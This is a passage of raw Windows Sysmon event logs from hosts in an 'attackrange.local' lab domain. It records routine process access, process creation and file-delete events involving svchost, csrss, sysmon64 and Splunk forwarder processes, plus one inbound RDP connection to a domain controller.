09:26:27.053{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.053{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.053{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8E43-6151-2B7A-00000000FD01}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.053{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E43-6151-2B7A-00000000FD01}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.054{69CF5F33-8E43-6151-2B7A-00000000FD01}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:24.808{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com29479-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000981843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.850{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642532DD00027973088952EDBFD5BA62,SHA256=5BD8E07FF329DF85DCF0FCA187C15A07CE1760194125F23C974DF6AC9DBC5C2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.850{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4D7A90AE232D52CE8A0B2F6EF66ADC4,SHA256=5F192C40D9BB0CA80025DECCB0804627CD6E4B156712D924C0FFF157C45131F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:28.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E89B19640151D49A638290F6C0A31CA8,SHA256=6A9012B3FCCEA0FA1F03F95430ADFFB2929FEBDD9B1A02A86E9507FD471C633F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E44-6151-2D7A-00000000FD01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8E44-6151-2D7A-00000000FD01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.382{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E44-6151-2D7A-00000000FD01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:28.367{69CF5F33-8E44-6151-2D7A-00000000FD01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:29.944{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB470904D4875F8B2A72FF41BE1C47F,SHA256=0E18C6A9116F5224D5EE416086D83A41DFD18BBD9C97EC33977F8F941ECCF6EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E45-6151-CB00-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E45-6151-CB00-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:29.662{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E45-6151-CB00-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 